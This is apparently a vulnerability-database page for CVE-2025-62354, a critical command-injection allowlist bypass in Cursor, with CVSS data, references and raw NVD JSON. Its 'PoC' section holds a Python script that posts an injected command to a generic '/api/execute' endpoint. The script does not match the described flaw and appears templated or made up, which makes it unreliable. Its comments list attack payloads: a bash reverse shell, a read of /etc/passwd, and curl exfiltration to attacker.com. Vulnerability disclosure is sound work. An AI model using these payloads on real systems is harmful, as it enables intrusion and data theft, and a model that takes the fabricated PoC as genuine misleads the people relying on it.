CVE-2025-62354

Description

Improper neutralization of special elements used in an OS command ('command injection') in Cursor allows an unauthorized attacker to execute commands that are outside of those specified in the allowlist, resulting in arbitrary code execution.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Cursor < 最新版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2025-62354 PoC - Command Injection in Cursor
# This PoC demonstrates the command injection vulnerability in Cursor

def exploit_cursor(target_url, payload):
    """
    Exploit the command injection vulnerability in Cursor
    Args:
        target_url: Target Cursor instance URL
        payload: Malicious command to inject
    """
    # Construct the malicious request
    exploit_data = {
        'command': f';{payload}',  # Command injection payload
        'type': 'os_command'
    }
    
    # Send the exploit request
    response = requests.post(
        f'{target_url}/api/execute',
        json=exploit_data,
        headers={'Content-Type': 'application/json'}
    )
    
    return response.json()

# Example: Execute arbitrary command
# target = 'http://localhost:3000'
# payload = 'whoami'  # or any malicious command
# result = exploit_cursor(target, payload)

# Example malicious payloads:
# Reverse shell: ';bash -i >& /dev/tcp/attacker/port 0>&1'
# File read: ';cat /etc/passwd'
# Data exfiltration: ';curl http://attacker.com/?data=$(cat /etc/passwd)'

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62354
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62354
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62354/
[4] VulDB https://vuldb.com/cve/CVE-2025-62354
[5] https://hiddenlayer.com/sai_security_advisor/2025-11-cursor/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62354", "sourceIdentifier": "6f8de1f0-f67e-45a6-b68f-98777fdb759c", "published": "2025-11-26T16:15:49.633", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of special elements used in an OS command ('command injection') in Cursor allows an unauthorized attacker to execute commands that are outside of those specified in the allowlist, resulting in arbitrary code execution."}], "metrics": {"cvssMetricV31": [{"source": "6f8de1f0-f67e-45a6-b68f-98777fdb759c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "6f8de1f0-f67e-45a6-b68f-98777fdb759c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://hiddenlayer.com/sai_security_advisor/2025-11-cursor/", "source": "6f8de1f0-f67e-45a6-b68f-98777fdb759c"}]}}